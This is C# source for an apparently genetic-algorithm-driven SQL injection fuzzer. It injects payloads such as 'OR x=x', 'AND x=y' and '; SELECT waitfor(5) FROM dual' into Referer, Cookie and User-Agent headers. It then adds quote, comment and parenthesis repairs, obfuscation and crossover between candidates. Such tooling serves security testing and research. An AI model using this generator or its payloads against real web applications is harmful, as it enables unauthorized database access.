public Gen obfuscation(Gen input_gen) { if (input_gen == null) { return(input_gen);//we can not mutate obfuscation when gen is null(have no alphabate to obfuscate) } //at least one header was mutate before comming to obfuscation if (!input_gen.mutated_header[0] && !input_gen.mutated_header[1] && !input_gen.mutated_header[2]) { return(input_gen); } if (!input_gen.mutation_approach[0] && !input_gen.mutation_approach[1])//behavoiur change (or at least syntax...)must be applied before comming to obfuscation { return(input_gen); } Random r = new Random(Guid.NewGuid().GetHashCode()); int mutation_type = r.Next(3, 7); //(1,7) int header = r.Next(0, 3); //to choose referee,user-agant or cookie header for mutation while (true) { if (!input_gen.mutated_header[header]) { header = r.Next(0, 3); } else { break; } } input_gen.mutated_header[header] = true; input_gen.mutation_approach[2] = true; //obfuscation header++; //1-3 not 0-2 switch (mutation_type) { /* * case 1://MO_wsp * * break; * case 2://MO_html * break; */ case 3: //MO_chr input_gen.obfuscation[0] = true; //MO_chr switch (header) { case 1: //referer input_gen.httprequest.Referer = MO_chr(input_gen.httprequest.Referer); break; case 2: //cookie input_gen.httprequest.Headers["Cookie"] = MO_chr(input_gen.httprequest.Headers["Cookie"]); break; case 3: //user-aganet input_gen.httprequest.UserAgent = MO_chr(input_gen.httprequest.UserAgent); break; } break; case 4: //MO_per input_gen.obfuscation[1] = true; //MO_per switch (header) { case 1: //referer input_gen.httprequest.Referer = MO_per(input_gen.httprequest.Referer); break; case 2: //cookie input_gen.httprequest.Headers["Cookie"] = MO_per(input_gen.httprequest.Headers["Cookie"]); break; case 3: //user-aganet input_gen.httprequest.UserAgent = MO_per(input_gen.httprequest.UserAgent); break; } break; case 5: //MO_bool input_gen.obfuscation[2] = true; //MO_bool switch (header) { case 1: //referer input_gen.httprequest.Referer = MO_bool(input_gen.httprequest.Referer); break; case 2: //cookie input_gen.httprequest.Headers["Cookie"] = MO_bool(input_gen.httprequest.Headers["Cookie"]); break; case 3: //user-aganet input_gen.httprequest.UserAgent = MO_bool(input_gen.httprequest.UserAgent); break; } break; case 6: //MO_keyw input_gen.obfuscation[3] = true; //MO_keyw switch (header) { case 1: //referer input_gen.httprequest.Referer = MO_keyw(input_gen.httprequest.Referer); break; case 2: //cookie input_gen.httprequest.Headers["Cookie"] = MO_keyw(input_gen.httprequest.Headers["Cookie"]); break; case 3: //user-aganet input_gen.httprequest.UserAgent = MO_keyw(input_gen.httprequest.UserAgent); break; } break; } return(input_gen); }
/// <summary> /// mutate input gen by three existence condition: mo_OR,mo_AND,mo_Semi /// </summary> /// <param name="input_gen"></param> /// <returns>return mutated gen</returns> public Gen behavoiur_mutation(Gen input_gen) { if (input_gen == null) { return(input_gen); } //input gen was not null if (input_gen.mutation_approach[0])//do not apply behavoiur mutation twice! { return(input_gen); } // Gen mutated_gen = new Gen(); Random r = new Random(Guid.NewGuid().GetHashCode()); int mutation_type = r.Next(1, 4); int header = r.Next(0, 3);//two choose referee,user-agant or cookie header for mutation input_gen.mutated_header[header] = true; header++; //counting from 1 ! input_gen.mutation_approach[0] = true; //behavoiur string temp; switch (mutation_type) { case 1: //mo_OR input_gen.behaviour_changing[0] = true; switch (header) { case 1: //referer // input_gen.mutated_header[0] = true; if (input_gen.httprequest.Referer == null) { input_gen.httprequest.Referer = "OR x=x"; } else { temp = input_gen.httprequest.Referer; input_gen.httprequest.Referer = "OR x=x"; input_gen.httprequest.Referer += temp; } break; case 2: //cookie if (input_gen.httprequest.Headers["Cookie"] == null) { input_gen.httprequest.Headers.Add("Cookie", "OR x = x"); } else { temp = input_gen.httprequest.Headers["Cookie"]; input_gen.httprequest.Headers["Cookie"] = "OR x = x"; input_gen.httprequest.Headers["Cookie"] += temp; } break; case 3: //user-agant // input_gen.mutated_header[2] = true; if (input_gen.httprequest.UserAgent == null) { input_gen.httprequest.UserAgent = "OR x=x"; } else { temp = input_gen.httprequest.UserAgent; input_gen.httprequest.UserAgent = "OR x=x"; input_gen.httprequest.UserAgent += temp; } break; } break; case 2: //mo_AND input_gen.behaviour_changing[1] = true; switch (header) { case 1: //referer // input_gen.mutated_header[0] = true; if (input_gen.httprequest.Referer == null) { input_gen.httprequest.Referer = "AND x=y"; } else { temp = input_gen.httprequest.Referer; input_gen.httprequest.Referer = "AND x=y "; input_gen.httprequest.Referer += temp; } break; case 2: //cookie // input_gen.mutated_header[1] = true; if (input_gen.httprequest.Headers["Cookie"] == null) { input_gen.httprequest.Headers.Add("Cookie", "AND x=y "); } else { temp = input_gen.httprequest.Headers["Cookie"]; input_gen.httprequest.Headers["Cookie"] = "AND x=y "; input_gen.httprequest.Headers["Cookie"] += temp; } break; case 3: //user-agant // input_gen.mutated_header[2] = true; if (input_gen.httprequest.UserAgent == null) { input_gen.httprequest.UserAgent = "AND x=y"; } else { temp = input_gen.httprequest.UserAgent; input_gen.httprequest.UserAgent = "AND x=y"; input_gen.httprequest.UserAgent += temp; } break; } break; case 3: //mo_semi input_gen.behaviour_changing[2] = true; switch (header) { case 1: //referer // input_gen.mutated_header[0] = true; if (input_gen.httprequest.Referer == null) { input_gen.httprequest.Referer = "; SELECT waitfor(5) FROM dual"; } else { temp = input_gen.httprequest.Referer; input_gen.httprequest.Referer = "; SELECT waitfor(5) FROM dual"; input_gen.httprequest.Referer += temp; } break; case 2: //cookie if (input_gen.httprequest.Headers["Cookie"] == null) { input_gen.httprequest.Headers.Add("Cookie", "; SELECT waitfor(5) FROM dual"); } else { temp = input_gen.httprequest.Headers["Cookie"]; input_gen.httprequest.Headers["Cookie"] = "; SELECT waitfor(5) FROM dual"; input_gen.httprequest.Headers["Cookie"] += temp; } break; case 3: //user-agant //input_gen.mutated_header[2] = true; if (input_gen.httprequest.UserAgent == null) { input_gen.httprequest.UserAgent = "; SELECT waitfor(5) FROM dual"; } else { temp = input_gen.httprequest.UserAgent; input_gen.httprequest.UserAgent = "; SELECT waitfor(5) FROM dual"; input_gen.httprequest.UserAgent += temp; } break; } break; } input_gen.mutation_approach[0] = true; return(input_gen); }
public Gen syntax_repairing(Gen input_gen) { //check precondition // if (!input_gen.mutation_approach[0])//behavoiur changinf applied before? // return input_gen;//without change // Gen mutated_gen = new Gen(); Random r = new Random(Guid.NewGuid().GetHashCode()); int mutation_type = r.Next(1, 4); if (input_gen.syntax_repairing[mutation_type - 1]) { return(input_gen); //this type of mutation was applied before! } int header = r.Next(0, 3); //two choose referee,user-agant or cookie header for mutation input_gen.mutated_header[header] = true; header++; input_gen.mutation_approach[1] = true; string temp = ""; switch (mutation_type) { case 1: //mo_par input_gen.syntax_repairing[0] = true; //par switch (header) { case 1: //referer if (input_gen.httprequest.Referer == null) { input_gen.httprequest.Referer = ") "; } else { temp = input_gen.httprequest.Referer; input_gen.httprequest.Referer = ") "; input_gen.httprequest.Referer += temp; } break; case 2: //cookie if (input_gen.httprequest.Headers["Cookie"] == null) { input_gen.httprequest.Headers["Cookie"] = ") "; } else { temp = input_gen.httprequest.Headers["Cookie"]; input_gen.httprequest.Headers["Cookie"] = ") "; input_gen.httprequest.Headers["Cookie"] += temp; } break; case 3: //user-agant if (input_gen.httprequest.UserAgent == null) { input_gen.httprequest.UserAgent = ") "; } else { temp = input_gen.httprequest.UserAgent; input_gen.httprequest.UserAgent = ") "; input_gen.httprequest.UserAgent += temp; } break; } break; case 2: //mo_cmt input_gen.syntax_repairing[1] = true; //cmt int rand = r.Next(0, 2); switch (header) { case 1: //referer if (rand == 0) { if (input_gen.httprequest.Referer == null) { input_gen.httprequest.Referer = "#"; } else { input_gen.httprequest.Referer += "#"; //# add to last of insertion } } else { if (input_gen.httprequest.Referer == null) { input_gen.httprequest.Referer = "--"; } else { input_gen.httprequest.Referer += "--"; } } break; case 2: //cookie if (input_gen.httprequest.Headers["Cookie"] == null) { if (rand == 0) { input_gen.httprequest.Headers["Cookie"] = "#"; } else { input_gen.httprequest.Headers["Cookie"] = "--"; } } else { if (rand == 0) { input_gen.httprequest.Headers["Cookie"] += "#"; } else { input_gen.httprequest.Headers["Cookie"] += "--"; } } break; case 3: //user-agant if (rand == 0) { if (input_gen.httprequest.UserAgent == null) { input_gen.httprequest.UserAgent = "#"; } else { input_gen.httprequest.UserAgent += "#"; } } else { if (input_gen.httprequest.UserAgent == null) { input_gen.httprequest.UserAgent = "--"; } else { input_gen.httprequest.UserAgent += "--"; } } break; } break; case 3: //mo_qot temp = ""; input_gen.syntax_repairing[2] = true; //qot rand = r.Next(0, 2); switch (header) { case 1: //referer if (input_gen.httprequest.Referer != null) { temp = input_gen.httprequest.Referer; } if (rand == 0) { input_gen.httprequest.Referer = "' "; } else { input_gen.httprequest.Referer = "\" "; } if (temp != "") { input_gen.httprequest.Referer += temp; } break; case 2: //cookie if (input_gen.httprequest.Headers["Cookie"] == null) { if (rand == 0) { input_gen.httprequest.Headers["Cookie"] = "' "; } else { input_gen.httprequest.Headers["Cookie"] = "\" "; } } else { temp = input_gen.httprequest.Headers["Cookie"]; if (rand == 0) { input_gen.httprequest.Headers["Cookie"] = "' "; } else { input_gen.httprequest.Headers["Cookie"] = "\" "; } input_gen.httprequest.Headers["Cookie"] += temp; } break; case 3: //user-agant if (input_gen.httprequest.UserAgent != null) { temp = input_gen.httprequest.UserAgent; } if (rand == 0) { input_gen.httprequest.UserAgent = "' "; } else { input_gen.httprequest.UserAgent = "\" "; } if (temp != "") { input_gen.httprequest.UserAgent += temp; } break; } break; } return(input_gen); }
}//end mutation func /// <summary> /// merge two gen and create two new children where updated to gen pool instead their parents /// </summary> /// <param name="parent1"></param> /// <param name="parent2"></param> public Gen[] Merg_parents(Gen parent1, Gen parent2) { Gen[] childrens = new Gen[2]; Random r = new Random(Guid.NewGuid().GetHashCode()); int rand = r.Next(0, 2);//to choose mutation approach from mution_approach of parents(probility 50-50) //detect mutation approach for parent1 //analysize parent2 and its mutation approach //maybe parent2 had both mutation(syntatx and obfuscation) //rand use to inherit mutation-approach randomly from his parents if (rand == 0) { if (parent2.mutation_approach[1]) //parent2 had syntax mutation { childrens[0] = syntax_repairing(parent1); //updated parent1 inhertant syntax mutation from his parents } else if (parent2.mutation_approach[2]) //updated parent1 inhertant obfuscation from his parents { childrens[0] = obfuscation(parent1); } } else //rand =1 { if (parent2.mutation_approach[2])//parent2 had obfuscation mutation { childrens[0] = obfuscation(parent1); } else if (parent2.mutation_approach[1])//parent2 had syntax-mutation mutation { childrens[0] = syntax_repairing(parent1); } } //detect mutation approach for parent2 //analysize parent1 and its mutation approach if (!parent2.mutation_approach[0]) { childrens[1] = behavoiur_mutation(parent2);//with no change } else { rand = r.Next(0, 2); if (rand == 0) { if (parent1.mutation_approach[1]) //parent2 had syntax mutation { childrens[1] = syntax_repairing(parent2); //updated parent1 inhertant syntax mutation from his parents } else if (parent1.mutation_approach[2]) //parent2 had obfuscation mutation { childrens[1] = obfuscation(parent2); } } else //rand =1 { if (parent1.mutation_approach[2])//parent2 had obfuscation mutation { childrens[1] = obfuscation(parent2); } else if (parent1.mutation_approach[1]) { childrens[1] = syntax_repairing(parent2); } } } return(childrens); }